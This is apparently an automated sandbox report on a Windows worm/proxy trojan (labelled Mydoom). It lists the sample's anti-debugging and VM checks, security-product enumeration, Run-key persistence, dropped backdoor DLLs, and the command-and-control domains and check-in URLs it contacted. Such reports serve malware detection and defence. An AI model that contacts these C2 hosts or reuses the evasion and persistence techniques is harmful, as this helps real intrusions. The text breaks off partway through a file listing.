Source: C:\Windows\SysWOW64\smnss.exe	Code function: 5_2_0040814C GetSystemTime followed by cmp: cmp ax, 001eh and CTI: jbe 00408196h	5_2_0040814C

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Thread delayed: delay time: 480000			Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	Thread delayed: delay time: 480000			Jump to behavior

Source: C:\Windows\SysWOW64\smnss.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0

Jump to behavior

Source: C:\Windows\SysWOW64\smnss.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess			graph_5-3931
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess			graph_0-4617

Source: C:\Windows\SysWOW64\smnss.exe	Code function: 5_2_00406BEA		5_2_00406BEA
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_00406BEA		0_2_00406BEA

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_00403790 _mbscpy,memset,FindFirstFileA,FindNextFileA,lstrcpy,_mbscat,FindClose,		0_2_00403790
Source: C:\Windows\SysWOW64\smnss.exe	Code function: 5_2_00403790 _mbscpy,memset,FindFirstFileA,FindNextFileA,lstrcpy,_mbscat,FindClose,		5_2_00403790

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Thread delayed: delay time: 480000			Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	Thread delayed: delay time: 480000			Jump to behavior

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	API call chain: ExitProcess graph end node	graph_0-4435
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	API call chain: ExitProcess graph end node	graph_0-4528
Source: C:\Windows\SysWOW64\smnss.exe	API call chain: ExitProcess graph end node	graph_5-3737
Source: C:\Windows\SysWOW64\smnss.exe	API call chain: ExitProcess graph end node	graph_5-3748
Source: C:\Windows\SysWOW64\smnss.exe	API call chain: ExitProcess graph end node	graph_5-3841
Source: C:\Windows\SysWOW64\smnss.exe	API call chain: ExitProcess graph end node	graph_5-4266

Source: C:\Windows\SysWOW64\smnss.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\	Jump to behavior

Source: smnss.exe, 0000000A.00000002.292078957.0000000000401000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: vmware
Source: smnss.exe, 00000007.00000002.283142592.00000000008B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: smnss.exe, 0000000A.00000002.292078957.0000000000401000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: rbhtmlhtmtxtxmldocpltbbSoftware\Microsoft\WAB\WAB4\Wab File Nametepbcl.qyyReadme.exefoto.pifFbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\IrefvbafgngrzvqhfrehfonpgvikgbeeuswkcnfjpafwIHYanFuibyanFlfgrz\PheeragPbagebyFrg\Freivprf\FunerqNpprffStartPYFVQ\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\VacebpFreire32k_fbpxf5nnauser32.dllfureinaf.qyypgszra.rkrSeDebugPrivilege%2.2x\virtualvmwareqemuvboxSYSTEM\ControlSet001\Services\Disk\Enum012ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzFbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvbatimerbjvavarg.qyyNTf2000fXpf2003fVIStafWinSUnk192.168.1.2vqhfretepbcl.qyyuser32.dllICQ 8.exeoffice_crack_all.exeWinrar 4.exeK-Lite Codec Pack 7.exeDivX 8.exeACDSee.exeWinamp 7.exeserials 2010.txt.execrack windows 7.execrack windows 8.exemy_passwords.exeFbsgjner\Xnmnn\GenafsreQyQve0\Fbsgjner\vZrfu\TrarenyQbjaybnqQvepgszra.rkrFbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Ehauser32.dll

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep			graph_0-4497
Source: C:\Windows\SysWOW64\smnss.exe	Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep			graph_5-3810

Source: C:\Users\user\Desktop\EAfIchN1gN.exe

Code function: 0_2_00404AB8 IsDebuggerPresent,

0_2_00404AB8

Source: C:\Users\user\Desktop\EAfIchN1gN.exe

Code function: 0_2_00406E1C LoadLibraryA,GetProcAddress,FreeLibrary,DeleteFileA,Sleep,

0_2_00406E1C

Source: C:\Users\user\Desktop\EAfIchN1gN.exe

Code function: 0_2_004060AA DnsQuery_A,GetProcessHeap,RtlAllocateHeap,lstrcpy,GlobalFree,

0_2_004060AA

Source: C:\Windows\SysWOW64\smnss.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\smnss.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_00401150 SetUnhandledExceptionFilter,__getmainargs,76E04600,76E04600,_setmode,76E04600,76E04600,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,76E04600,_setmode,76E04600,	0_2_00401150
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_00401149 SetUnhandledExceptionFilter,__getmainargs,76E04600,76E04600,_setmode,76E04600,76E04600,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,	0_2_00401149
Source: C:\Windows\SysWOW64\ctfmen.exe	Code function: 4_2_00401150 SetUnhandledExceptionFilter,__getmainargs,76E04600,76E04600,_setmode,76E04600,76E04600,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,76E04600,_setmode,76E04600,	4_2_00401150
Source: C:\Windows\SysWOW64\ctfmen.exe	Code function: 4_2_00401149 SetUnhandledExceptionFilter,__getmainargs,76E04600,76E04600,_setmode,76E04600,76E04600,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,	4_2_00401149
Source: C:\Windows\SysWOW64\smnss.exe	Code function: 5_2_00401150 SetUnhandledExceptionFilter,__getmainargs,76E04600,76E04600,_setmode,76E04600,76E04600,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,76E04600,_setmode,76E04600,	5_2_00401150
Source: C:\Windows\SysWOW64\smnss.exe	Code function: 5_2_00401149 SetUnhandledExceptionFilter,__getmainargs,76E04600,76E04600,_setmode,76E04600,76E04600,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,76E04600,_setmode,76E04600,	5_2_00401149

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Process created: C:\Windows\SysWOW64\ctfmen.exe ctfmen.exe	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe	Jump to behavior

Source: C:\Users\user\Desktop\EAfIchN1gN.exe

Code function: 0_2_00407C4E GetLocalTime,CreateThread,

0_2_00407C4E

Source: C:\Users\user\Desktop\EAfIchN1gN.exe

Code function: 0_2_00405256 GetVersionExA,

0_2_00405256

Source: C:\Windows\SysWOW64\ctfmen.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\SysWOW64\ctfmen.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\SysWOW64\ctfmen.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\ctfmen.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: C:\Users\user\Desktop\EAfIchN1gN.exe

Code function: 0_2_10002020 xproxy_th@4,WSAStartup,socket,htons,rot13,Get_Reg_SZ,Get_Reg_SZ,rot13,rot13,bind,listen,accept,create_thread,closesocket,

0_2_10002020

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	Path Interception	1 Access Token Manipulation	121 Masquerading	1 Input Capture	11 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	12 Native API	Boot or Logon Initialization Scripts	11 Process Injection	241 Virtualization/Sandbox Evasion	LSASS Memory	361 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Access Token Manipulation	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	3 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	12 Software Packing	DCSync	3 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
EAfIchN1gN.exe	74%	Metadefender		Browse
EAfIchN1gN.exe	96%	ReversingLabs	Win32.Worm.Mydoom
EAfIchN1gN.exe	100%	Avira	TR/Proxy.Gen
EAfIchN1gN.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\SysWOW64\ctfmen.exe	100%	Avira	TR/Crypt.ULPM.Gen
C:\Windows\SysWOW64\grcopy.dll	100%	Avira	TR/Proxy.Gen
C:\Windows\SysWOW64\smnss.exe	100%	Avira	TR/Proxy.Gen
C:\Windows\SysWOW64\shervans.dll	100%	Avira	BDS/Backdoor.Gen
C:\Windows\SysWOW64\satornas.dll	100%	Avira	HTML/ExpKit.Gen2
C:\Windows\SysWOW64\ctfmen.exe	100%	Joe Sandbox ML
C:\Windows\SysWOW64\grcopy.dll	100%	Joe Sandbox ML
C:\Windows\SysWOW64\zipfiaq.dll	100%	Joe Sandbox ML
C:\Windows\SysWOW64\smnss.exe	100%	Joe Sandbox ML
C:\Windows\SysWOW64\zipfi.dll	100%	Joe Sandbox ML
C:\Windows\SysWOW64\shervans.dll	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
7.0.smnss.exe.400000.1.unpack	100%	Avira	TR/Proxy.Gen	Download File
5.0.smnss.exe.400000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.0.smnss.exe.400000.3.unpack	100%	Avira	TR/Proxy.Gen	Download File
10.0.smnss.exe.400000.2.unpack	100%	Avira	TR/Proxy.Gen	Download File
5.0.smnss.exe.10000000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.0.smnss.exe.400000.3.unpack	100%	Avira	TR/Proxy.Gen	Download File
8.0.smnss.exe.400000.1.unpack	100%	Avira	TR/Proxy.Gen	Download File
13.0.smnss.exe.400000.1.unpack	100%	Avira	TR/Proxy.Gen	Download File
4.2.ctfmen.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.smnss.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.0.smnss.exe.400000.2.unpack	100%	Avira	TR/Proxy.Gen	Download File
8.0.smnss.exe.400000.0.unpack	100%	Avira	TR/Proxy.Gen	Download File
13.2.smnss.exe.400000.0.unpack	100%	Avira	TR/Proxy.Gen	Download File
6.0.smnss.exe.400000.3.unpack	100%	Avira	TR/Proxy.Gen	Download File
4.0.ctfmen.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
5.2.smnss.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.0.smnss.exe.400000.0.unpack	100%	Avira	TR/Proxy.Gen	Download File
13.0.smnss.exe.400000.2.unpack	100%	Avira	TR/Proxy.Gen	Download File
6.0.smnss.exe.400000.2.unpack	100%	Avira	TR/Proxy.Gen	Download File
7.0.smnss.exe.400000.2.unpack	100%	Avira	TR/Proxy.Gen	Download File
7.0.smnss.exe.400000.3.unpack	100%	Avira	TR/Proxy.Gen	Download File
5.0.smnss.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.0.smnss.exe.400000.1.unpack	100%	Avira	TR/Proxy.Gen	Download File
7.0.smnss.exe.400000.0.unpack	100%	Avira	TR/Proxy.Gen	Download File
0.0.EAfIchN1gN.exe.400000.0.unpack	100%	Avira	TR/Proxy.Gen	Download File
5.2.smnss.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.smnss.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.0.smnss.exe.400000.1.unpack	100%	Avira	TR/Proxy.Gen	Download File
10.0.smnss.exe.400000.0.unpack	100%	Avira	TR/Proxy.Gen	Download File
5.0.smnss.exe.10000000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.smnss.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.EAfIchN1gN.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.smnss.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.0.smnss.exe.400000.0.unpack	100%	Avira	TR/Proxy.Gen	Download File
0.2.EAfIchN1gN.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.smnss.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

URLs

Source	Detection	Scanner	Label	Link
http://spmhaasaen.biz/imgs/krewa/nqxa.php?id=5143sudk&s5=3159&lip=192.168.2.4&win=Unk	0%	Avira URL Cloud	safe
http://ehmpeseeaa.ws/imgs/krewa/nqxa.php?id=5143sudk&s5=3159&lip=192.168.2.4&win=Unk	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ehmpeseeaa.ws	64.70.19.203	true	true	unknown
spmhaasaen.biz	206.191.152.37	true	true	unknown
apaqseasqs.com	unknown	unknown	true	unknown
qwphqwsspa.info	unknown	unknown	true	unknown
naearnqmas.us	unknown	unknown	true	unknown
rqwapnshss.org	unknown	unknown	true	unknown
mesnqrmmwn.in	unknown	unknown	true	unknown
wnnrshhwns.in	unknown	unknown	true	unknown
npehhsmnsa.us	unknown	unknown	true	unknown
qaepmnrnma.info	unknown	unknown	true	unknown
sqeppehhwa.biz	unknown	unknown	true	unknown
mnerhqmqes.in	unknown	unknown	true	unknown
sersepwrnr.biz	unknown	unknown	true	unknown
mwphqrqpsa.in	unknown	unknown	true	unknown
pnhrphrsws.in	unknown	unknown	true	unknown
hraqsaqsqh.net	unknown	unknown	true	unknown
pawsnqwmph.in	unknown	unknown	true	unknown
peeahprsqs.in	unknown	unknown	true	unknown
weswpsqess.in	unknown	unknown	true	unknown
qhmawaqhrs.info	unknown	unknown	true	unknown
hwsamwmwph.net	unknown	unknown	true	unknown
wmsqhqawsh.in	unknown	unknown	true	unknown
reepsrepnh.org	unknown	unknown	true	unknown
aeaqnmehen.com	unknown	unknown	true	unknown
mprnamhpnn.in	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://spmhaasaen.biz/imgs/krewa/nqxa.php?id=5143sudk&s5=3159&lip=192.168.2.4&win=Unk	true	Avira URL Cloud: safe	unknown
http://ehmpeseeaa.ws/imgs/krewa/nqxa.php?id=5143sudk&s5=3159&lip=192.168.2.4&win=Unk	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
64.70.19.203	ehmpeseeaa.ws	United States		3561	CENTURYLINK-LEGACY-SAVVISUS	true
206.191.152.37	spmhaasaen.biz	United States		29791	VOXEL-DOT-NETUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	666951
Start date and time: 17/07/202208:22:50	2022-07-17 08:22:50 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	EAfIchN1gN.com_343aab3b8c412c765f9fc753e1f18520 (renamed file extension from com_343aab3b8c412c765f9fc753e1f18520 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@19/14@25/3
EGA Information:	Successful, ratio: 75%
HDC Information:	Successful, ratio: 78% (good quality ratio 49.7%) Quality average: 46.4% Quality standard deviation: 41.5%
HCA Information:	Successful, ratio: 99% Number of executed functions: 65 Number of non-executed functions: 127
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.189.173.22
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com
Execution Graph export aborted for target smnss.exe, PID 1992 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: EAfIchN1gN.exe

Simulations

Behavior and APIs

Time	Type	Description
08:24:07	API Interceptor	40x Sleep call for process: EAfIchN1gN.exe modified
08:24:07	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run ctfmen C:\Windows\system32\ctfmen.exe
08:24:14	API Interceptor	36x Sleep call for process: smnss.exe modified
08:24:43	API Interceptor	1x Sleep call for process: WerFault.exe modified
08:25:30	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_smnss.exe_dede56669acbf059a837271e30c65f7ed19fe3a_e99d7581_06cf4a96\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9524104660180869
Encrypted:	false
SSDEEP:	96:+hFi69UGMFhMoI7Jf4pXIQcQvc6QcEDMcw3DSWP+HbHg/oJAnQ0DFInGqlnvKckD:+0GKHBUZMXQjL5d4S7/u7sDS274It2
MD5:	2630B0B082289A03C25651640CF44D34
SHA1:	A588B7C6063579E25E901CF980BC620D89631F72
SHA-256:	94779AF5E892E406E6A5718AAB2163E5B6ED7C866C5E222238D4F07563D1A188
SHA-512:	C3614003982E3BA59C3D60A64357B575407F80382E09D3948FF00CC80B285AF9AFAB879EF47F90A37B5A5FD3E389EC7AD4F8A4AF8CB287A0A3745D99DA8DF11E
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.2.5.1.2.6.6.3.7.4.4.1.4.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.2.5.1.2.6.6.6.0.8.7.8.9.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.4.1.f.8.7.8.-.1.3.d.4.-.4.8.3.0.-.b.a.1.6.-.a.6.0.8.7.9.1.1.e.6.6.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.7.4.4.b.c.5.-.7.3.9.5.-.4.4.a.0.-.8.1.f.7.-.a.1.6.7.9.7.d.f.2.c.4.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.m.n.s.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.b.4.-.0.0.0.1.-.0.0.1.c.-.3.3.4.7.-.6.7.d.4.a.5.9.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.b.7.8.f.9.d.8.a.9.9.e.8.7.4.e.e.0.0.d.c.f.1.0.e.c.3.7.2.6.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.3.5.9.5.f.7.8.5.6.2.7.e.6.7.9.a.b.f.d.d.4.2.4.7.b.8.9.f.4.5.4.9.9.f.3.6.4.e.1.!.s.m.n.s.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER561.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	6314
Entropy (8bit):	3.7239658682823067
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiiC6IAElivdY5SC+prR89b+JsfmKm:RrlsNif6IARdY5Sw+ifi
MD5:	870E8EA2D27D62AADAEC96214DCEADAF
SHA1:	DE4E69944AF793CCA169A8D723B1431B7E61F7C1
SHA-256:	AF9976C3B511792FA30F54CF00DB27CC614E6BD6A36EC27260F050FE4027A2C5
SHA-512:	6E73B375D9E9984E7F01730D8033C1570499A46775791628C7FA561BFE526D5DE71680D41E708B85309E7C2976A5D29BE4AEC59B1385975091BDF3ECD43D0856
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.6.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B9.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4578
Entropy (8bit):	4.463604240749939
Encrypted:	false
SSDEEP:	48:cvIwSD8zsaJgtWI9vjLWgc8sqYjjpa8fm8M4J5RZFlS+q8ghvyH3z3p2d:uITfoYj6grsqYVJ/5SFvyj3p2d
MD5:	655A04414E9376BE0409E4DA70C30BDC
SHA1:	4C718B2C4EFC90DF50A02B151D25CAE07F91FF22
SHA-256:	A59FD86F2AEE206AC222A66537460620F13B16D1CCF42AC068E4EA3611AB6EC8
SHA-512:	05719D2C10DD13826D1923975DBBE58179DD30CB7A367CEFDA6C12D27EDCD9A7842A4A5185D5EFFC8EC5A359E2CE4B7E7D25060D8BC50F614F8EC6FCDBF58C51
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1606535" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF26.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
